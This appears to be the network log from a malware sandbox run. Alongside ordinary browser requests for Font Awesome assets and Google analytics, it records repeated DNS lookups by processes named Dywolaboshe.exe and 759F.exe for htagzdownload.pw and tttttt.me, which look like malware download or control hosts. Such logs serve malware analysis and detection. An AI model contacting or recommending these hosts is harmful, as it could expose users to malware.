                                                                                          content-type: text/css
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:23:57 GMT
                                                                                          etag: W/"22be82a519ceafc43258d8f58a37fcf5"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          vary: Accept-Encoding
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 4b3bed207ec72204ebc89ae818e573ef.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: 28XQZoeQfVkj_-pLBLx5cgiPi81P6PP08MZOOyc6aac7O5j4oRMB3Q==
                                                                                          age: 987342
                                                                                          cf-cache-status: HIT
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jXMn67zHwN9zN1hYESU7ftrBMWMT0pZeZajfkMGwzPlV3vdj4Q%2B1TByF%2BjL%2B4cG1i7n9wwIxz9K1a1QWiZobujcw50mrLFTCHk5wr9t3N0xrVCCmxsN8rUcUJnptHQ1adaI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326949810c81-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/css/free-v4-shims.min.css?token=55e0136003
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/css/free-v4-shims.min.css?token=55e0136003 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          origin: https://www.utopia-network.org
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: text/css
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:23:57 GMT
                                                                                          etag: W/"8a99ce81ec2f89fbca03f2c8cf1a3679"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          vary: Accept-Encoding
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 eec12a22159207af63748eccf10799b3.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: lwnZEStqx5kEsi4i70dYs7D6FLVQWid6koMFeQIbYPYrPsZXGolP_w==
                                                                                          age: 987342
                                                                                          cf-cache-status: HIT
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=7lyK0Bs%2Bx7Hxxac1BdifbXJQRnqaNb2ox5Lz8KubOwP%2FxVfIDTrYr%2Bc26vn6UMYsPeHwqEZhKrcCwn4pfMPGFYUfmf8PPm9Ni6fr%2B0XTUfTAht6Ca4VDY%2BNSx8Ea62saUCU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326949740c81-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/css/free-v4-font-face.min.css?token=55e0136003
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/css/free-v4-font-face.min.css?token=55e0136003 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          origin: https://www.utopia-network.org
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: text/css
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:23:57 GMT
                                                                                          etag: W/"390b4210e10c744c3c597500bcf0b31a"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          vary: Accept-Encoding
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 bb1fd0922e473ba97ff6a00f6c71141b.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: 3RAjBo6_4kkbckMe1W47bit_2srWrIzvbo27uH2mHs1-tZmQEi38wQ==
                                                                                          age: 987342
                                                                                          cf-cache-status: HIT
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=3ORUCv9Mqs4qAfFxgCVvZVBr%2B04UIMiTXZtgEsvUMnjCLqt0AfYQzvzPtV1ZUjtNKPexlq8K68ZN79GKedct4U19ks6Q%2BHUW1WhlUPl6OawGDC%2Fo%2BPqxU8TLgDdZNGGEGWE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326949730c81-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/webfonts/free-fa-brands-400.woff2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/webfonts/free-fa-brands-400.woff2 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: font/woff2
                                                                                          content-length: 76732
                                                                                          last-modified: Wed, 17 Mar 2021 02:28:17 GMT
                                                                                          etag: "f226ebb9ea1cc388279081a65b6a7bb0"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          access-control-max-age: 3000
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 4b28b963946514dd2cf9a90f74a8034a.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: ek3btQ31TlBwzVFvgPhCBnPG1HmaenFstBuY1oq66NyhyCc4c2LgTA==
                                                                                          age: 987341
                                                                                          cf-cache-status: HIT
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=dYrhglSZKXdKWcS9tfN%2FeottDcnqgBd2OpLeVWFxeFKG%2FCOAXW36NVYn7GgsyLar4hi%2BjT%2FFP%2BtWicd0hcn5%2BeqYHk0vigJDnXItnzHtlHCR3b1l7tpeSc89EFBmTuICRrA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326a4ab80c81-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/webfonts/free-fa-solid-900.woff2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/webfonts/free-fa-solid-900.woff2 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          content-type: font/woff2
                                                                                          content-length: 78212
                                                                                          last-modified: Wed, 17 Mar 2021 02:28:18 GMT
                                                                                          etag: "4e463cfb29c596ba3bb8b0c2469914e5"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          access-control-max-age: 3000
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 51d16867ea09d1b4c52eca0e090ad4a3.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: i9kFFxj8TSfHFFnOSK3JNTHQrwWufCYD6qq4Cf4Bwd8fDU0LUQvWSw==
                                                                                          age: 987339
                                                                                          cf-cache-status: HIT
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=3v3BKP7FqBcn27wLbUlUkkgvdpu9V7CYWkjSvJxnoiQBiVvEYCLM47dTxQCJ9RtaxRnLazUcwJg6b%2BttDdbd0Qyj35tpNcXmEzSnoBo4A4E2zRgx6UYgm6fO8PFrjAxJaIg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326dbee10c81-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/webfonts/free-fa-regular-400.woff2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/webfonts/free-fa-regular-400.woff2 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          content-type: font/woff2
                                                                                          content-length: 13292
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:28:17 GMT
                                                                                          etag: "3f46d884913ca952661ea484e4646fd2"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 9385401cebb473e4ed1da6c81b927c52.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS1-C1
                                                                                          x-amz-cf-id: LtDf5aIysm7dFtoft25--nTPE-zHtjRG16JgH5tEsLS1X5U7YLtrqw==
                                                                                          age: 260351
                                                                                          cf-cache-status: HIT
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=uqZw8w1roJa4o7r5oepybvRAyXjag9VKED8n1Y5dKV2u4fQMJ8ypRZgAhQs8CGKUQdDlcXmBhFydmJkQCCD1e9aZgKPoFT7baizAO5q8IoC6cah%2BAwaI%2BBf4tKEAa4%2F7GHo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326e1f650c81-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/webfonts/free-fa-v4deprecations.woff2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/webfonts/free-fa-v4deprecations.woff2 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          content-type: font/woff2
                                                                                          content-length: 6832
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:28:18 GMT
                                                                                          etag: "b47073c6673ded317ed90cd96c78a8ea"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 697a26790d3ab8292d8546ca9be87bbd.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: 8PJiK5SsM---x1mf8OE1s19s6xXrQyvahCro9-uiuJP6lJtnX81j5Q==
                                                                                          age: 886265
                                                                                          cf-cache-status: HIT
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kPcKDUb7a1M97BnQLq4ZZ8IOvf%2FPQ9XlQMYJY6a0bEZiXxf07ozXAAXc3AY53dfuNcli09XCzXSzyDqiH%2BuzXYpWmxKShVMOO5Hg112iM14EtcfOf4ONX7l%2BRRIZTedZ1yw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326e2f7a0c81-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          stats.g.doubleclick.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          stats.g.doubleclick.net
                                                                                          IN A
                                                                                          Response
                                                                                          stats.g.doubleclick.net
                                                                                          IN CNAME
                                                                                          stats.l.doubleclick.net
                                                                                          stats.l.doubleclick.net
                                                                                          IN A
                                                                                          142.250.102.156
                                                                                          stats.l.doubleclick.net
                                                                                          IN A
                                                                                          142.250.102.157
                                                                                          stats.l.doubleclick.net
                                                                                          IN A
                                                                                          142.250.102.155
                                                                                          stats.l.doubleclick.net
                                                                                          IN A
                                                                                          142.250.102.154
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j91&tid=UA-166755442-7&cid=736343894.1625878909&jid=1448099274&gjid=417027051&_gid=1931332999.1625878909&_u=YEBAAUAAAAAAAC~&z=745282342
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          142.250.102.156:443
                                                                                          Request
                                                                                          POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j91&tid=UA-166755442-7&cid=736343894.1625878909&jid=1448099274&gjid=417027051&_gid=1931332999.1625878909&_u=YEBAAUAAAAAAAC~&z=745282342 HTTP/2.0
                                                                                          host: stats.g.doubleclick.net
                                                                                          accept: */*
                                                                                          origin: https://www.utopia-network.org
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          content-type: text/plain
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          content-length: 0
                                                                                          cache-control: no-cache
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          access-control-allow-origin: https://www.utopia-network.org
                                                                                          strict-transport-security: max-age=10886400; includeSubDomains; preload
                                                                                          date: Fri, 09 Jul 2021 23:05:27 GMT
                                                                                          pragma: no-cache
                                                                                          expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                          cache-control: no-cache, no-store, must-revalidate
                                                                                          last-modified: Sun, 17 May 1998 03:00:00 GMT
                                                                                          access-control-allow-credentials: true
                                                                                          x-content-type-options: nosniff
                                                                                          content-type: text/plain
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          server: Golfe2
                                                                                          content-length: 4
                                                                                          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.google.nl
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.google.nl
                                                                                          IN A
                                                                                          Response
                                                                                          www.google.nl
                                                                                          IN A
                                                                                          172.217.168.227
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.google.nl/ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j91&tid=UA-166755442-7&cid=736343894.1625878909&jid=1448099274&_u=YEBAAUAAAAAAAC~&z=2071940509
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.217.168.227:443
                                                                                          Request
                                                                                          GET /ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j91&tid=UA-166755442-7&cid=736343894.1625878909&jid=1448099274&_u=YEBAAUAAAAAAAC~&z=2071940509 HTTP/2.0
                                                                                          host: www.google.nl
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                          timing-allow-origin: *
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          date: Fri, 09 Jul 2021 23:05:27 GMT
                                                                                          pragma: no-cache
                                                                                          expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                          cache-control: no-cache, no-store, must-revalidate
                                                                                          content-type: image/gif
                                                                                          x-content-type-options: nosniff
                                                                                          server: cafe
                                                                                          content-length: 42
                                                                                          x-xss-protection: 0
                                                                                          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
